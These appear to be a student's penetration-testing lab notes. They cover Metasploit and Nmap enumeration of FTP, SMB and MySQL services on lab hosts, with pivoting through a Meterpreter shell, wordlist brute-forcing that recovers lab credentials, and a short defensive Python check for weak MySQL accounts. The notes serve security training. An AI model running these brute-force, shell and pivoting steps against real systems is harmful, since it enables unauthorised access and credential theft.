
Enumeration



What is Enumeration?


First we do passive information gathering, then active information gathering (host discovery and port scanning). The next, logical phase is service enumeration.




In this phase we interact directly with the target system, mostly with its open ports, so it falls under active information gathering techniques.


Penetration Testing Methodology

We are in the Enumeration phase.


Nmap Scripting Engine (NSE)


We will be using Metasploit with Nmap.



Nmap can write its results to a file with -oN, -oX, -oS or -oG (normal, XML, script kiddie and grepable output). To use the file in Metasploit we use -oX (XML).

The format will be like this:
nmap -Pn -sV -O <IP> -oX <file_name>

Importing Nmap Scan Results into MSF

Step 1: Check that the target is reachable: ping -c 4 demo.ine.local

Step 2: Importing Nmap scan results into MSF

Perform the Nmap scan and save the output in XML format:
nmap -sV -Pn -oX myscan.xml demo.ine.local

After performing an Nmap scan and exporting the results in XML format, you can import them directly into MSF.

Step 3: To begin with, start the PostgreSQL database service that MSF uses for its database. This can be done by running the following command: service postgresql start

Then start MSF: msfconsole

To check whether the database is connected: db_status

Step 4: You can now import the Nmap scan results; in this case, we import the scan results from the previous lab exercise: db_import myscan.xml

Step 5: We can now view the results by running the following commands:

hosts
services

Conclusion

This lab demonstrates the process of importing Nmap scan results into the Metasploit Framework, enabling efficient integration of network discovery and vulnerability exploitation.




"Post scan using auxiliary modules" typically refers to post-exploitation scanning or enumeration done after an initial vulnerability scan or exploit, using auxiliary modules in a tool like Metasploit.

Let's break it down:


What are Auxiliary Modules?

In Metasploit, auxiliary modules are modules that are not used to exploit a vulnerability directly, but instead perform scanning, enumeration, information gathering, DoS, or post-exploitation tasks.


What is a Post Scan?

A post scan (short for post-exploitation scan) is typically run after gaining access to a system. It's used to gather further intel about:

  • System internals
  • Network configuration
  • User accounts
  • Password hashes
  • Running services
  • Other systems reachable from the compromised host

Putting It Together: "Post Scan using Auxiliary Modules"

This usually refers to running Metasploit auxiliary modules after initial access has been achieved, in order to:

  • Enumerate network shares
  • Dump credentials
  • Check for privilege escalation paths
  • Scan other internal machines (pivoting)
  • Collect data like browser history, clipboard, or saved Wi-Fi passwords

show options is a handy command while inside msf; it lists the current module's settings. For this module they were:

RHOSTS: demo1.ine.local
RPORT: 80
TARGETURI: /
LHOST: in my case it was <192.140.245.2>
LPORT: 4444


Once inside the Meterpreter session, run sysinfo:

meterpreter > sysinfo
Computer    : demo1.ine.local
OS          : Linux demo1.ine.local 6.8.0-40-generic #40-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 5 10:34:03 UTC 2024 x86_64
Meterpreter : php/linux

meterpreter > shell
Process 805 created.
Channel 1 created.
/bin/bash -i
bash: cannot set terminal process group (433): Inappropriate ioctl for device
bash: no job control in this shell
www-data@demo1:/app/files$ ifconfig


ifconfig shows the compromised host's own interfaces, which reveals the internal network where the next target (victim 2) sits.

Terminate the shell by pressing Ctrl+C.

Back in Meterpreter, add a route to that internal network through this session: run autoroute -s 192.102.109.2


Now, back in the msf console:

Check the sessions (sessions) > search portscan > use 5 > set RHOSTS 192.102.109.3 > run


msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.102.109.3: - 192.102.109.3:22 - TCP OPEN
[+] 192.102.109.3: - 192.102.109.3:21 - TCP OPEN
[+] 192.102.109.3: - 192.102.109.3:80 - TCP OPEN
[*] 192.102.109.3: - Scanned 1 of 1 hosts (100% complete)


Service Enumeration



1. Enumerated FTP Server Version

Module: auxiliary/scanner/ftp/ftp_version

Command

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.85.52.3
run

Purpose:

Retrieve FTP banner to identify the version and software type.

Result:

220 ProFTPD 1.3.5a Server (AttackDefense-FTP

Successfully identified the FTP server as ProFTPD 1.3.5a.


2. Scanned for Valid Logins Using Brute Force

Module: auxiliary/scanner/ftp/ftp_login

Command Sequence:

use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.85.52.3
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
run

Purpose:

Attempt to brute-force valid FTP credentials using common usernames and passwords.

Result: Found valid logins:

  • sysadmin : 654321
  • rooty : qwerty
  • demo : butterfly
  • auditor : chocolate

3. Checked for Anonymous Access

Module: auxiliary/scanner/ftp/anonymous

Command:

use auxiliary/scanner/ftp/anonymous
set RHOSTS 192.85.52.3
run

Purpose:

Check if the FTP server allows anonymous login.

Result:

No anonymous access was allowed; the module completed with no successful login.


4. Manually Retrieved File After Successful Login

Command:

ftp 192.85.52.3
# Login with valid creds: sysadmin / 654321
ls
get secret.txt

Purpose:

Access FTP server manually to list files and retrieve secret.txt.

Result:

Successfully downloaded secret.txt (33 bytes)


FTP Enumeration is the process of gathering information from an FTP (File Transfer Protocol) server to identify potential entry points or weaknesses that can be exploited. This typically involves connecting to the FTP service to extract details such as server version (banner grabbing), checking for anonymous login access, and performing brute-force attacks to discover valid user credentials. Once access is gained, it may be possible to list directories, download files, or even upload malicious payloads. FTP enumeration is a vital phase in vulnerability assessments and penetration testing, especially when targeting legacy or misconfigured servers.


SMB ENUMERATION



SMB (Server Message Block) is the protocol used to share files and printers between machines on a network, for example the shared printers in offices and cafes.

Instead of setting RHOST every time we load a module, make it a global variable:

setg RHOST <192.219.123.3>

Verify the global variable: getg RHOST


1. SMB Version Detection

  • Module used: auxiliary/scanner/smb/smb_version
  • Purpose: Identify the supported SMB protocol versions and detect the OS.
  • Result:
    • SMB v1, v2, and v3 are supported.
    • Preferred dialect: SMB 3.1.1
    • Host OS: Windows 6.1 (Samba 4.3.11-Ubuntu)

2. User Enumeration (SAM)

  • Module used: auxiliary/scanner/smb/smb_enumusers
  • Purpose: List local users via the SAM RPC service.
  • Result:
    • Enumerated users: john, elie, aisha, shawn, emma, admin
    • Domain: SAMBA-RECON

3. Share Enumeration

  • Module used: auxiliary/scanner/smb/smb_enumshares
  • Purpose: Enumerate SMB shares.
  • Result:
    • Found shares: public, john, aisha, emma, everyone, IPC$
    • Share type: all are disk shares except IPC$ (special IPC service)

4. Brute-Force SMB Login

  • Module used: auxiliary/scanner/smb/smb_login
  • Purpose: Try multiple passwords against user admin using a Unix wordlist.
  • Result:
    • Successful login with: admin:password

5. Manual SMB Exploration Using smbclient

  • Accessed: Shares with valid credentials

    • \\192.219.123.3\public

      • Navigated to /secret folder
      • Retrieved a flag file containing:

        03ddb97933e716f5057a18632badb3b4
        
    • \\192.219.123.3\aisha

      • Navigated to /dir
      • Retrieved another flag file containing:

WEB SERVER ENUMERATION




MySQL Enumeration


System Info & Services

  • Network Interfaces:
    • eth0: Internal IP 10.1.0.6
    • eth1: Connected to target subnet 192.106.83.0/24 with IP 192.106.83.2
  • PostgreSQL Service:
    • PostgreSQL 16 successfully started with:

      service postgresql start
      

1. Metasploit Setup

  • Launched msfconsole and created workspace MySQL_ENUM.
  • Set global target: RHOSTS = 192.106.83.3.

2. Scanned the Target

  • Verified port 3306 is open via auxiliary/scanner/portscan/tcp.
  • Confirmed MySQL version:

    5.5.61-0ubuntu0.14.04.1
    

3. Credential Discovery

  • Used mysql_login module with a wordlist.
  • Found valid login:

    root:twinkle
    

4. Enumeration

  • Extracted:
    • User accounts
    • Password hashes
    • Privileged users (GRANT, SUPER, FILE, etc.)
  • Identified weak configurations (e.g., root@% with password, some empty password users)
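The weak configurations listed above are exactly what a defender should check for in mysql.user before an attacker enumerates them. As an added example (not the lab's code, and not a Metasploit module), the checker below audits constructed mysql.user rows for empty passwords, root reachable from remote hosts, and dangerous privileges on non-root accounts; column names follow the MySQL 5.5 mysql.user table (Password, Super_priv, File_priv, Grant_priv), which is an assumption matching the 5.5.61 server found above.

```python
# Added example (not from the lab): audit mysql.user rows for the weak
# configurations the enumeration step surfaced. Rows are constructed;
# column names assume MySQL 5.5 (newer versions use authentication_string).
AUDIT_QUERY = ("SELECT User, Host, Password, Super_priv, File_priv, Grant_priv "
               "FROM mysql.user")  # what a DBA would run to get these rows
DANGEROUS_PRIVS = ("Super_priv", "File_priv", "Grant_priv")
LOCAL_HOSTS = ("localhost", "127.0.0.1", "::1")

# Constructed sample rows mirroring the findings: root@% with a password,
# an empty-password account, and an ordinary application account.
SAMPLE_USERS = [
    {"User": "root", "Host": "localhost", "Password": "*HASH1",
     "Super_priv": "Y", "File_priv": "Y", "Grant_priv": "Y"},
    {"User": "root", "Host": "%", "Password": "*HASH1",
     "Super_priv": "Y", "File_priv": "Y", "Grant_priv": "Y"},
    {"User": "filetest", "Host": "localhost", "Password": "",
     "Super_priv": "N", "File_priv": "Y", "Grant_priv": "N"},
    {"User": "app", "Host": "10.1.0.%", "Password": "*HASH2",
     "Super_priv": "N", "File_priv": "N", "Grant_priv": "N"},
]

def audit_user(row):
    """Return the list of findings for one mysql.user row (empty if clean)."""
    findings = []
    account = f"{row['User']}@{row['Host']}"
    if row["Password"] == "":
        findings.append(f"{account}: empty password")
    if row["Host"] in ("%", ""):
        findings.append(f"{account}: reachable from any host")
    if row["User"] == "root" and row["Host"] not in LOCAL_HOSTS:
        findings.append(f"{account}: root login allowed from a remote host")
    privs = [p for p in DANGEROUS_PRIVS if row.get(p) == "Y"]
    if privs and row["User"] != "root":
        findings.append(f"{account}: non-root account holds {', '.join(privs)}")
    return findings

def audit_users(rows):
    """Flatten the findings for a whole mysql.user result set."""
    return [f for row in rows for f in audit_user(row)]
```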

5. Database Discovery

  • Queried:
    • select version();